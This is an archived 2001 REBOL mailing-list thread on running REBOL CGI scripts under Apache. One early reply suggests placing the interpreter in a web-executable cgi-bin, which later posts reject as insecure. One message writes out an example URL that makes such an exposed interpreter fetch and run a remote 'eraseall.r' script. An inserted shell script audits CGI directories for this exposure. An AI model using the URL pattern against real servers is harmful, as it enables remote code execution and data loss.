
APACHE + REBOL as CGI?

 [1/27] from: carlos:lorenz at: 30-Jul-2001 12:17


Hi friends,

I'm trying to run some CGI in REBOL on the server but have no success. According to the support team (that loves PERL) their machines (running APACHE) are not configured to support REBOL as CGI.

My question is: is it really necessary to configure APACHE to recognize REBOL scripts or can I just upload REBOL.EXE to a subdirectory under my space and from there use it to run my scripts?

Carlos

 [2/27] from: matt:blis at: 14-Sep-2001 16:31


Carlos Lorenz <[carlos--lorenz--net]> wrote on 30/07/01 16:17:20:
>Hi friends,
>I'm trying to run some CGI in REBOL on the server but have no success.
<<quoted lines omitted: 3>>
>REBOL scripts or can I just upload REBOL.EXE to a subdirectory under
>my space and from there use it to run my scripts?

Hi Carlos. I did this:

1. Put rebol executable in location like /usr/bin/rebol/
2. Initialise rebol network via telnet or editing the user.r file
3. create scripts with .cgi ending
4. Set shebang to #!/usr/bin/rebol/rebol --cgi

Worked like a charm, without needing to update any apache conf files. I think apache has built in support for .cgi files.

Hope this is of some use.

Matt.

 [3/27] from: ryan:christiansen:intellisol at: 14-Sep-2001 10:29


I run REBOL on Apache all of the time without configuring Apache.

Put rebol executable in the /bin or /cgi-bin and chmod 755

all scripts should shebang to the rebol executable (e.g. #!rebol -cs)

make sure your scripts are set executable (e.g. chmod 755)

Also, use .cgi extensions on your scripts. This is key, since Apache is probably set up to execute .cgi files, but NOT .r files.

-Ryan

"Carlos Lorenz" <[carlos--lorenz].net>
Sent by: [rebol-bounce--r]ebol.com
07/30/2001 10:47 AM
Please respond to rebol-list
To: <[rebol-list--rebol--com]>
cc:
Subject: [REBOL] APACHE + REBOL as CGI?

Hi friends,

I'm trying to run some CGI in REBOL on the server but have no success. According to the support team (that loves PERL) their machines (running APACHE) are not configured to support REBOL as CGI.

My question is: is it really necessary to configure APACHE to recognize REBOL scripts or can I just upload REBOL.EXE to a subdirectory under my space and from there use it to run my scripts?

Carlos

 [4/27] from: tim:johnsons-web at: 14-Sep-2001 9:00


On Fri, Sep 14, 2001 at 10:29:32AM -0500, [ryan--christiansen--intellisol--com] wrote:
> I run REBOL on Apache all of the time without configuring Apache.
>
> Put rebol executable in the /bin or /cgi-bin and chmod 755
>
> all scripts should shebang to the rebol executable (e.g. #!rebol -cs)
>
> make sure your scripts are set executable (e.g. chmod 755)
>
> Also, use .cgi extensions on your scripts. This is key, since Apache is
> probably set up to execute .cgi files, but NOT .r files.

I run rebol apps as .r extensions on both my home linux machine and my domain (linux also). Not a problem that I've seen, but if anyone has any comments on that process, I'd welcome an alternative opinion.

I strongly recommend against using the default cgi-bin directory. I use "ScriptAlias".

Tim
> -Ryan > "Carlos
<<quoted lines omitted: 28>>
> [rebol-request--rebol--com] with "unsubscribe" in the > subject, without the quotes.
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [5/27] from: ryanc:iesco-dms at: 14-Sep-2001 9:09


Ryan,

You should never ever put any type of interpreter in a directory accessible from the internet with executable permissions. Security holes don't get any bigger than this.

--Ryan Cole

[ryan--christiansen--intellisol--com] wrote:
> I run REBOL on Apache all of the time without configuring Apache.
> Put rebol executable in the /bin or /cgi-bin and chmod 755
<<quoted lines omitted: 34>>
-- Ryan Cole Programmer Analyst www.iesco-dms.com 707-468-5400

 [6/27] from: matt:blis at: 14-Sep-2001 17:11


[ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
>I run REBOL on Apache all of the time without configuring Apache.
>
>Put rebol executable in the /bin or /cgi-bin and chmod 755

I wouldn't advise this, as it's gonna open up massive holes in your server, unless you're running on your local machine and firewalled up to the teeth...

Matt

 [7/27] from: ryan:christiansen:intellisol at: 14-Sep-2001 11:21


It never occurred to me before that this would be a problem. Now that I think about it though.... whoah! Good thoughts.

-Ryan

Matt Burns <[matt--blis--co].uk>
Sent by: [rebol-bounce--r]ebol.com
09/14/2001 11:11 AM
Please respond to rebol-list
To: [rebol-list--rebol--com]
cc:
Subject: [REBOL] Re: APACHE + REBOL as CGI?

[ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
>I run REBOL on Apache all of the time without configuring Apache.
>
>Put rebol executable in the /bin or /cgi-bin and chmod 755
I wouldn't advise this, as it's gonna open up massive holes in your server, unless you're running on your local machine and firewalled up to the teeth... Matt

 [8/27] from: tim:johnsons-web at: 14-Sep-2001 9:21


On Fri, Sep 14, 2001 at 05:11:50PM +0100, Matt Burns wrote:
> [ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32: > >
<<quoted lines omitted: 4>>
> server, unless you're running on your local machine and firewalled up > to the teeth...
I agree. I use symlink (ln) and ScriptAlias and I AM firewalled up to the teeth....
> Matt
>
> --
> To unsubscribe from this list, please send an email to
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [9/27] from: matt:blis at: 14-Sep-2001 17:32


Tim Johnson <[tim--johnsons-web--com]> wrote on 14/09/01 18:21:46:
>On Fri, Sep 14, 2001 at 05:11:50PM +0100, Matt Burns wrote: >> [ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
<<quoted lines omitted: 8>>
>I agree. I use symlink (ln) and ScriptAlias and I AM firewalled up >to the teeth....
:-) Matt.

 [10/27] from: john:thousand-hills at: 14-Sep-2001 17:44


Give it a shot. I run Rebol that way on NT with Sambar. With NT/IIS, I have to install the rebol. I will be attempting to run scripts on Redhat 7.1 next week. //john At 12:17 PM 7/30/2001 -0300, you wrote:

 [11/27] from: ryanc:iesco-dms at: 14-Sep-2001 17:16


I don't mean to preach, but just make very sure that it is not visible from the web. Something like this with the proper url encoding could be deadly:

http://www.nosecurity.com/cgi-bin/rebol/rebol -cs --do "do http://hacksters.com/eraseall.r"

--Ryan

john wrote:
> Give it a shot. I run Rebol that way on NT with Sambar.
> With NT/IIS, I have to install the rebol.
<<quoted lines omitted: 11>>
-- Ryan Cole Programmer Analyst www.iesco-dms.com 707-468-5400

 [12/27] from: john:thousand-hills at: 14-Sep-2001 19:40


I don't get it Ryan? Why would not having to "install" Rebol make a security hole? //john At 05:16 PM 9/14/2001 -0700, you wrote:

 [13/27] from: matt:blis at: 15-Sep-2001 11:14


> From: [rebol-bounce--rebol--com] [mailto:[rebol-bounce--rebol--com]]
> On Behalf Of john
>
> I don't get it Ryan? Why would not having to "install" Rebol make a
> security hole?

As Ryan pointed out with his very astute example, placing the Rebol binary in the cgi-bin does two things:

1) it allows your Rebol executable to be used in any url on your server
2) it allows *anyone* to do 1)

Due to the nature of Rebol being able to 'do remote scripts, someone could quite easily write a script to send files/passwords/do system commands on YOUR server.

This is Not A Good Thing(tm)

Matt.
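
Added example, not part of the original thread and not any poster's code: a check for the condition discussed above, an interpreter binary (or a script whose shebang resolves to one) sitting inside a web-executable directory. The interpreter name list, the finding labels and the function name `audit_cgi_dir` are assumptions of this sketch.

```shell
#!/bin/sh
# Added example: audit a CGI-executable directory for exposed interpreters.
# INTERPRETER_NAMES and the finding labels are assumptions of this sketch.
INTERPRETER_NAMES="rebol rebol.exe perl perl.exe python php sh bash tclsh"

# audit_cgi_dir DIR: print "<finding> <path>" for each file worth reviewing.
audit_cgi_dir() {
    cgi_dir=$(cd "$1" && pwd -P) || return 2
    find "$cgi_dir" -type f | while IFS= read -r f; do
        base=$(basename "$f")
        for name in $INTERPRETER_NAMES; do
            if [ "$base" = "$name" ]; then
                echo "interpreter-in-cgi-dir $f"
            fi
        done
        # First four bytes as hex: 7f454c46 = ELF, 4d5a = PE "MZ", 2321 = "#!"
        magic=$(od -An -tx1 -N4 "$f" | tr -d ' \n')
        case $magic in
            7f454c46|4d5a*)
                # Compiled CGI programs are legitimate; an interpreter is not.
                if [ -x "$f" ]; then echo "native-executable-review $f"; fi ;;
            2321*)
                # Interpreter path = first word after "#!" on line one.
                interp=$(head -n 1 "$f" |
                    sed 's/^#![[:space:]]*//; s/[[:space:]].*$//')
                case $interp in
                    "$cgi_dir"/*) echo "shebang-inside-cgi-dir $f" ;;
                    /*) : ;;  # absolute path outside the CGI tree
                    *)  echo "relative-shebang $f" ;;
                esac ;;
        esac
    done
}
```

Run it against each directory the server maps with ScriptAlias; a script using `#!/usr/bin/rebol/rebol --cgi` produces no finding, while `#!rebol -cs` next to a copied `rebol` binary produces two.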

 [14/27] from: gchiu:compkarori at: 15-Sep-2001 23:51


> As Ryan pointed out with his very astute example, placing the Rebol
> binary in the cgi-bin does two things:
>
> 1) it allows your Rebol executable to be used in any url on your server
> 2) it allows *anyone* to do 1)

I would like to see a working example of this exploit. It has been mentioned before, but has *anyone* actually got it to do this??

-- Graham Chiu

 [15/27] from: matt:blis at: 15-Sep-2001 12:38


> -----Original Message----- > From: [rebol-bounce--rebol--com] [mailto:[rebol-bounce--rebol--com]]
<<quoted lines omitted: 13>>
> has been mentioned before, but has *anyone* actually got it > to do this??
I doubt you will ever see this on any live server[1]! This is a very, very well known security hazard, and is explained in more detail here

http://www.cert.org/advisories/CA-1996-11.html

HTH

Matt.

[1] that's been set up by someone that knows what they're doing.

 [16/27] from: john:thousand-hills at: 15-Sep-2001 9:50


Let me ask again, what does this have to do with NOT INSTALLING Rebol?

I merely copied the files into a directory REBOL similar to the way I have done PERL for years. The only operating system that has demands for the setup of REBOL, or PERL for that matter is NT4/IIS4 and 2000-Server/IIS5.. And I use all these OS combinations professionally and use PERL/REBOL now on all of them. I just started using Rebol on Redhat 7.1 this week. Otherwise NT/2000 with Sambar and Redhat is simply copy the files and use them.

The common thread, as I see it -is that IIS requires the setup to work with PERL and REBOL.. Now if that makes me stupid or insecure -so be it, maybe you are just brighter than the rest of us.

/john

At 12:38 PM 9/15/2001 +0100, you wrote:

 [17/27] from: john:thousand-hills at: 15-Sep-2001 9:53


Matt: First -you are assuming that not installing Rebol equates to placing it in the CGI-BIN. You made that assumption, I did not. I copied PERL into its own directory for years, why would I place REBOL in the bin? //john At 11:14 AM 9/15/2001 +0100, you wrote:

 [18/27] from: tim:johnsons-web at: 15-Sep-2001 17:58


Hi John:

I've noticed your questions and have time to just touch briefly on it with what I know. I personally don't know why one would have to be concerned about the location of the binary. Doesn't sound to me like you're doing anything incorrect as far as Linux goes.....

I do not think it's a good idea to have the rebol binary in cgi-bin, and it's really a good idea to have your own internal mapping so that you're not really using the standard cgi-bin. I'm referring to using the ScriptAlias, which is in either access.conf or httpd.conf on RH 7.0 (I think - just use RH 6.0 myself).

I'm sorry that I can't offer more than that, perhaps there will be more on this after the weekend.

HINT: Sometimes it helps to repost under a different subject if you don't get the full edification that you are looking for.

TIA
Tim

On Sat, Sep 15, 2001 at 09:50:17AM -0500, john wrote:
> Let me ask again, what does this have to do with NOT INSTALLING Rebol? > I merely copied the files into a directory REBOL similar to the way I have
<<quoted lines omitted: 16>>
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [19/27] from: john:thousand-hills at: 15-Sep-2001 21:25


Thanks Tim.

I have Rebol running. In Linux each domain has its own CGI-BIN for the scripts but the binaries and libraries reside in a directory accessed via an alias. As with NT/SAMBAR I simply created the REBOL directories and copied files, added " .r " to the cgi-bin as an accepted suffix attempting to keep the directories identical to my other servers for platform script/compatibility sake.

I say again -the only combination that I have experienced any trouble running Rebol is NT/IIS combinations. The book covers little of what is necessary to run rebol there and we fell upon it kind of by accident, but have just recently set up 3 very active servers to run REBOL on top of IIS-4 (one gets a Million hits a month).

Any way, NT/IIS is the only combination I see requiring formal installation. And the setup required is identical to that of PERL. That should help.

We will document the steps necessary and pass them on to the REBOL and Book authors.

John

At 05:58 PM 9/15/2001 -0800, you wrote:

 [20/27] from: john:thousand-hills at: 15-Sep-2001 21:47


Tim:

I wholeheartedly suggest that you go to 7.1 Redhat. The difference is overwhelming. My installation takes up about 40Meg and the setup runs a real nice selection of server components. Be liberal because in about 10 days (you can change that) the system will set any unused services to a hot-standby status freeing up the assets until they are needed.

It runs Rock Solid, now I am talking 7.1 not 7.0

John

At 05:58 PM 9/15/2001 -0800, you wrote:

 [21/27] from: tim:johnsons-web at: 15-Sep-2001 20:10


On Sat, Sep 15, 2001 at 09:47:13PM -0500, john wrote:
> Tim:
I will be building a new machine in a month or so. I do expect to go to something with the new Kernel..... I imagine I will choose either RH 7.1 or SUSE...
> I whole hearted suggest that you go to 7.1 Redhat. The difference is > overwhelming.
<<quoted lines omitted: 14>>
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [22/27] from: tim:johnsons-web at: 15-Sep-2001 20:13


On Sat, Sep 15, 2001 at 09:25:24PM -0500, john wrote:
> Thanks Tim. > I have Rebol running. In Linux each domain has its own CGI-BIN for the
<<quoted lines omitted: 13>>
> We will document the steps necessary and pass them on the REBOL and Book > authors.
Great! Pass them on to me too. I've got nothing on the internet with that combination, but would like to be informed in case I have any requests to go on an NT server...
> John > At 05:58 PM 9/15/2001 -0800, you wrote:
<<quoted lines omitted: 20>>
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

 [23/27] from: john:thousand-hills at: 15-Sep-2001 22:31


Ok, I will document it all Monday and pass it by the LAN Administrator to make sure I miss nothing. He and I did all three (NT-4/IIS-4) servers together because the book was a little weak. All three were equally difficult and identical in the resolution.

I was surprised because my Linux and Sambar servers were so auto-loaded by copy/paste from the CD -I was not expecting a formal install procedure. Thank God the CD had the files in a directory called " /rebol/ "...

/john

At 08:13 PM 9/15/2001 -0800, you wrote:

 [24/27] from: john:thousand-hills at: 15-Sep-2001 23:39


Tim:

You never know when you will need NT. The client sometimes demands the standard because they are afraid to be dependent on finding another contractor with SAMBAR or LINUX knowledge. This is the same problem I have with Rebol. Until I showed them things they were unable to accomplish before. When they realized that Rebol would free them from the need for NT to run ASP, they jumped aboard.

The project that convinced them was the bus routes for the blind, not only will it talk to them, it is dynamic, once any change hits the data base -the next request displays it. It has saved me a well documented 8 man weeks per year, and I draw a very high salary. They were impressed. Even more than all that, the blind can SEE (or hear) the schedules -that was a very high goal for me. And some of you guys helped me out.

John

At 08:13 PM 9/15/2001 -0800, you wrote:

 [25/27] from: matt:blis at: 16-Sep-2001 14:28


John wrote:
> Let me ask again, what does this have to do with NOT INSTALLING Rebol?
Sorry, I quoted you as you were the last to reply, not in direct response. AFAIK this has nothing to do with whether you've installed Rebol or not. As long as the executable is not directly available, you shouldn't have too many problems in that area.

Sorry for the confusion! I'll mind the quotes next time!

Matt.

 [26/27] from: john:thousand-hills at: 16-Sep-2001 23:28


Actually Matt, we go to great lengths to alias our access to the binaries.

I am a retired US Naval Officer -communications and Intelligence. My oldest son is in Air Force Intel. Computer Forensics and a Redhat Certified Linux Engineer.

I have him run my systems for access holes, then patch it up according to his recommendations. Having done that, I don't worry because I can't stop anybody smarter than all that.

//john

At 02:28 PM 9/16/2001 +0100, you wrote:

 [27/27] from: tim:johnsons-web at: 17-Sep-2001 8:40


On Sun, Sep 16, 2001 at 11:28:02PM -0500, john wrote:
> Actually Matt, we go to great lengths to alias our access to the binaries.
>
> I am a retired US Naval Officer -communications and Intelligence. My oldest
> son is in Air Force Intel. Computer Forensics and a Redhat Certified Linux
> Engineer.

This is sort of off-topic here, but I want to pose this question (which IS apropos to these times) IMHO: If so much interest is shown in hacking microsoft, sending viruses in email, and general mischief (and some of it seems so well done), why not "enlist" these hackers in disrupting, intercepting, communications and money flow between terrorists.

On a slightly related note, I have an article written 1-Sep-2001 that might be of slight interest. Disclaimer: My persona in this "webzine" is to be somewhat provocative, somewhat tongue-in-cheek and rambling is permissible BUT, having said that - I both plug rebol and talk about some serious stuff that most of us haven't shown a lot of interest in, but perhaps that has changed now.

http://www.frozen-north-linuxonline.com/
see "Tim's Bytes"

tj

> I have him run my systems for access holes, then patch it up according to
> his recommendations.
<<quoted lines omitted: 25>>
-- Tim Johnson <[tim--johnsons-web--com]> http://www.johnsons-web.com

Notes
  • Quoted lines have been omitted from some messages.
    View the message alone to see the lines that have been omitted